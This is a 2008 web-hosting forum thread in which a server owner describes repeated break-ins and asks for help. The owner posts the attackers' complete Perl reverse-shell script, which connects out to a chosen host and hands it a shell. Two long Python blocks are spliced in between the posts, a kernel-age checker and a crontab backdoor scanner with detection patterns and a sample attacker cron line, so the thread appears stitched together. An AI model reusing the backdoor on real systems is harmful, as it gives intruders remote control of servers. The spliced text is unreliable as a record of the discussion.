Server hacked - unable to log case at Support panel [SOLVED]

breun
Long Time Forum Regular
Posts: 2813
Joined: Sat Aug 20, 2005 9:30 am
Location: The Netherlands

Unread post by breun »

Can you find a kernel version in Plesk (e.g. something like "Operating system: Linux 2.6.9-78.0.5.EL")? Or can you run "uname -a" via SSH?

I don't know if Plesk 8.3 has any known security vulnerabilities, but Plesk 8.6 is the current version.
Lemonbit Internet Dedicated Server Management
biggles
Forum Regular
Posts: 806
Joined: Tue Jul 15, 2008 2:38 pm
Location: Sweden

Unread post by biggles »

uname -a: 2.6.9-023stab046.2-enterprise
biggles
Forum Regular
Posts: 806
Joined: Tue Jul 15, 2008 2:38 pm
Location: Sweden

Unread post by biggles »

OT: Is it safe to upgrade to 8.6 now? I am a little bit worried since the debacle with 8.4...
breun
Long Time Forum Regular
Posts: 2813
Joined: Sat Aug 20, 2005 9:30 am
Location: The Netherlands

Unread post by breun »

biggles wrote: uname -a: 2.6.9-023stab046.2-enterprise
The current 'super stable' RHEL4-based OpenVZ-kernel is 2.6.9-023stab048.4. I have no idea how old 2.6.9-023stab046.2 is. I believe uname -a also gives you a build date?
biggles wrote: OT: Is it safe to upgrade to 8.6 now? I am a little bit worried since the debacle with 8.4...
What debacle? We updated all our machines to 8.4 and then 8.6. No problems whatsoever.
Lemonbit Internet Dedicated Server Management
biggles
Forum Regular
Posts: 806
Joined: Tue Jul 15, 2008 2:38 pm
Location: Sweden

Unread post by biggles »

uname -s: 2.6.9-023stab046.2-enterprise #1 SMP Mon Dec 10 15:22:33 MSK 2007 i686 i686 i386 GNU/Linux

Debacle: A lot of people had trouble with e-mail and finally SWsoft released an update. http://kb.parallels.com/en/5256
breun
Long Time Forum Regular
Posts: 2813
Joined: Sat Aug 20, 2005 9:30 am
Location: The Netherlands

Unread post by breun »

biggles wrote: uname -s: 2.6.9-023stab046.2-enterprise #1 SMP Mon Dec 10 15:22:33 MSK 2007 i686 i686 i386 GNU/Linux
Well, that is an older kernel. I don't know if it contains any known local root exploits though. I track security vulnerabilities in the packages we use closely, but we're not running Virtuozzo, so I don't know about those Virtuozzo/OpenVZ kernels.
biggles wrote: Debacle: A lot of people had trouble with e-mail and finally SWsoft released an update. http://kb.parallels.com/en/5256
Oh that. I never thought allowing the use of short mail account names was a smart idea, so this issue didn't affect us.
Lemonbit Internet Dedicated Server Management
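The two posts above compare a reported kernel string with the release breun names as current. As an added example (not code from the thread or from any of its participants), the Python below parses `uname -a` output into the OpenVZ stab release and build date and decides whether the running kernel is older than a given reference. It assumes the stab numbering convention visible in the thread (2.6.9-023stab046.2: upstream 2.6.9, branch 023, build 046.2) is what should be compared; the sample strings are the ones quoted in this thread.

```python
import re
from datetime import datetime

# Strings taken from this thread: the kernel biggles reported and the release
# breun named as the current 'super stable' RHEL4-based OpenVZ kernel.
REPORTED_UNAME = ("2.6.9-023stab046.2-enterprise #1 SMP Mon Dec 10 15:22:33 MSK 2007 "
                  "i686 i686 i386 GNU/Linux")
CURRENT_STABLE = "2.6.9-023stab048.4"

# 2.6.9-023stab046.2 -> upstream 2.6.9, OpenVZ branch 023, stab build 046.2
STAB_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)-(\d+)stab(\d+)\.(\d+)")
# "Mon Dec 10 15:22:33 MSK 2007": weekday, month, day, time, zone name, year
BUILD_DATE_RE = re.compile(r"(\w{3} \w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (\w+) (\d{4})")


def parse_stab_release(release):
    """Turn an OpenVZ/Virtuozzo stab release string into a tuple of ints that
    compares correctly: '2.6.9-023stab046.2-enterprise' -> (2, 6, 9, 23, 46, 2).
    A trailing flavour such as '-enterprise' is ignored."""
    m = STAB_RE.match(release)
    if not m:
        raise ValueError(f"not an OpenVZ stab release: {release!r}")
    return tuple(int(g) for g in m.groups())


def parse_uname(uname_line):
    """Extract the release string and build date from `uname -a` output.
    Accepts the full output ('Linux host 2.6.9-... #1 SMP ...') as well as the
    trimmed form quoted in the thread, which starts at the release string."""
    release = next((f for f in uname_line.split() if STAB_RE.match(f)), None)
    if release is None:
        raise ValueError("no OpenVZ stab release found in uname output")
    build_date = None
    m = BUILD_DATE_RE.search(uname_line)
    if m:
        # The zone name (MSK) is dropped: strptime cannot map it to an offset,
        # and day-level precision is all a kernel-age check needs.
        build_date = datetime.strptime(f"{m.group(1)} {m.group(3)}",
                                       "%a %b %d %H:%M:%S %Y")
    return {"release": release, "build_date": build_date}


def kernel_is_outdated(uname_line, current_release):
    """True when the running stab kernel is older than current_release."""
    running = parse_uname(uname_line)["release"]
    return parse_stab_release(running) < parse_stab_release(current_release)


def kernel_age_days(uname_line, today_iso):
    """Days between the kernel's build date and today_iso ('YYYY-MM-DD')."""
    build = parse_uname(uname_line)["build_date"]
    if build is None:
        return None
    return (datetime.fromisoformat(today_iso) - build).days


if __name__ == "__main__":
    info = parse_uname(REPORTED_UNAME)
    print("running:", info["release"], "built", info["build_date"])
    print("outdated vs", CURRENT_STABLE + ":", kernel_is_outdated(REPORTED_UNAME, CURRENT_STABLE))
```

On a real host, feed it `subprocess.check_output(["uname", "-a"], text=True)` and the release string your kernel vendor currently publishes; the build date alone does not tell you whether a specific local-root bug is fixed, so treat "outdated" as a prompt to check the vendor's changelog, not as a verdict.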
BerArt
Forum Regular
Posts: 478
Joined: Tue Jan 15, 2008 3:57 am
Location: Netherlands

Unread post by BerArt »

I hope you can solve this, this is the worst nightmare for a hoster :( good luck!
scott
Atomicorp Staff - Site Admin
Posts: 8355
Joined: Wed Dec 31, 1969 8:00 pm
Location: earth

Unread post by scott »

Whenever I have a bad feeling about an upgrade, I always test it on something first. Set up a vmware/kvm/xen/etc with the same PSA version, and do a backup/restore on that.

I can't stress how important it is to test when you're unsure. Worst case you waste a few hours, and learn some shortcuts.
biggles
Forum Regular
Posts: 806
Joined: Tue Jul 15, 2008 2:38 pm
Location: Sweden

Unread post by biggles »

A small update. The attackers got in again last night (European time). This time I caught them in the act and had the possibility to secure logs etc. They had also installed some programs, among others "zap", "zmuie", some flood-kit, part of IlloGiC RooTKiT v1.0, etc. etc. They seemed to be running some tainted crond version. Support has been granted access to my server. Hopefully they will find out how they got in.
BerArt
Forum Regular
Posts: 478
Joined: Tue Jan 15, 2008 3:57 am
Location: Netherlands

Unread post by BerArt »

I hope so too, good luck! please keep us posted...
biggles
Forum Regular
Posts: 806
Joined: Tue Jul 15, 2008 2:38 pm
Location: Sweden

Unread post by biggles »

Not much news. Scott had trouble logging in today. Hopefully he can do another attempt later. They broke into the server again today. They are executing this script via crontab:

#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] <Port>\n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}
print "[*] Datached\n\n";

If anyone has any input on how to stop this, I am all ears...
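The post above shows the attacker's connect-back script being launched from crontab and asks how to stop it. As an added example (not code from the thread or from any of its participants), the Python below is a defender's scanner: it walks crontab entries, reads each absolute script path an entry references, and flags scripts that carry the four marks of a connect-back shell visible in the quoted script (a raw socket, an outbound connect(), the standard streams re-pointed at the socket, and a shell handed to the remote end), plus scripts living in temp or hidden directories. The crontab text, the file contents and the 198.51.100.7 address are constructed for the example; the `read_file` callback is an assumption so the scan can run offline against an in-memory file set.

```python
import re
from pathlib import PurePosixPath

# Indicators matching the connect-back script quoted in the thread. All four
# together mean "this script hands a shell to a remote host".
INDICATORS = {
    "socket":      re.compile(r"\buse\s+(IO::)?Socket\b|\bsocket\s*\(|\bimport\s+socket\b"),
    "connect":     re.compile(r"\bconnect\s*\("),
    "fd_redirect": re.compile(r"open\s*\(\s*STD(IN|OUT|ERR)\s*,\s*[\"']>&|\bdup2\s*\("),
    "shell_exec":  re.compile(r"\bexec\b[^\n]*/bin/(ba)?sh\b"),
}
CONNECT_BACK = set(INDICATORS)
SUSPECT_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
INTERPRETERS = {"perl", "python", "sh", "bash", "php", "env", "nohup"}
CRON_FIELDS = 5  # minute hour dom month dow, then the command

# Constructed sample crontab (not from the thread): one benign job, one
# cron entry of the kind described above, pointing at a hidden temp dir.
SAMPLE_CRONTAB = """\
# constructed sample crontab
MAILTO=root
0 3 * * * /usr/local/bin/nightly-backup.sh
*/5 * * * * /usr/bin/perl /tmp/.x/cb.pl 198.51.100.7 443 >/dev/null 2>&1
"""

# Constructed in-memory files. The second entry carries only the marker
# lines a scanner keys on; it is not a working program.
SAMPLE_FILES = {
    "/usr/local/bin/nightly-backup.sh": "#!/bin/sh\ntar czf /backup/site.tgz /var/www\n",
    "/tmp/.x/cb.pl": (
        "#!/usr/bin/perl\nuse Socket;\n"
        "if (!connect(SERVER, $addr)) { die }\n"
        "open(STDIN,\">&SERVER\");\nopen(STDOUT,\">&SERVER\");\n"
        "exec {'/bin/sh'} '-bash';\n"
    ),
}


def read_sample_file(path):
    """Stand-in for open(path).read(); returns None when the path is absent."""
    return SAMPLE_FILES.get(path)


def script_indicators(text):
    """Names of the connect-back indicators found in a script body."""
    return {name for name, rx in INDICATORS.items() if rx.search(text)}


def parse_crontab(text, system_format=False):
    """Yield (line_number, command) for each job line. system_format=True
    handles /etc/crontab and /etc/cron.d, which carry a user field."""
    extra = 1 if system_format else 0
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+\s*=", line):
            continue  # blank, comment or environment assignment
        nfields = 1 + extra if line.startswith("@") else CRON_FIELDS + extra
        parts = line.split(None, nfields)
        if len(parts) > nfields:
            yield lineno, parts[nfields]


def scan_crontab(text, read_file, system_format=False):
    """Return one finding per script referenced by a crontab job."""
    findings = []
    for lineno, command in parse_crontab(text, system_format):
        for token in command.split():
            path = token.lstrip("<>")
            if not path.startswith("/") or path == "/dev/null":
                continue
            if PurePosixPath(path).name in INTERPRETERS:
                continue  # the interpreter itself, not the job's script
            content = read_file(path)
            if content is None:
                continue
            found = script_indicators(content)
            parts = PurePosixPath(path).parts[1:]
            if path.startswith(SUSPECT_DIRS) or any(p.startswith(".") for p in parts):
                found.add("hidden_or_temp_path")
            if CONNECT_BACK <= found:
                verdict = "connect-back shell"
            elif found:
                verdict = "suspicious"
            else:
                verdict = "clean"
            findings.append({"line": lineno, "script": path,
                             "indicators": sorted(found), "verdict": verdict})
    return findings


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB, read_sample_file):
        print(f"line {f['line']}: {f['script']} -> {f['verdict']} {f['indicators']}")
```

On a live host, pass a `read_file` that opens the path with `errors="replace"` and returns None on OSError, and run it over every user spool file, /etc/crontab and /etc/cron.d (with `system_format=True` for the latter two). Since the thread also mentions a tainted crond, do not trust the cron tables alone: verify the cron package's files with `rpm -V`, and compare the scheduled commands against what is actually running in the process list.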
hostingguy
Forum Regular
Posts: 661
Joined: Mon Oct 29, 2007 6:51 pm

Unread post by hostingguy »

Did you ever get anywhere on this ?
scott
Atomicorp Staff - Site Admin
Posts: 8355
Joined: Wed Dec 31, 1969 8:00 pm
Location: earth

Unread post by scott »

Yeah, a ways. The hosting company is very unhelpful. Can anyone recommend some decent European providers?
BerArt
Forum Regular
Posts: 478
Joined: Tue Jan 15, 2008 3:57 am
Location: Netherlands

Unread post by BerArt »

We can deliver quality hosting from the Netherlands! You can mail me at info @ ber-art.nl. Our servers are being maintained by Lemonbit (alias breun).
Last edited by BerArt on Wed Nov 12, 2008 5:23 am, edited 1 time in total.
faris
Long Time Forum Regular
Posts: 2321
Joined: Thu Dec 09, 2004 11:19 am

Unread post by faris »

Yes, you can't go wrong with breun/Lemonbit.

I've "known" them for a very long time from these forums and you will never get bad advice from them. Same goes for BerArt!

Faris.
--------------------------------
<advert>
If you want to rent a UK-based VPS that comes with friendly advice and support from a fellow ART fan, please get in touch.
</advert>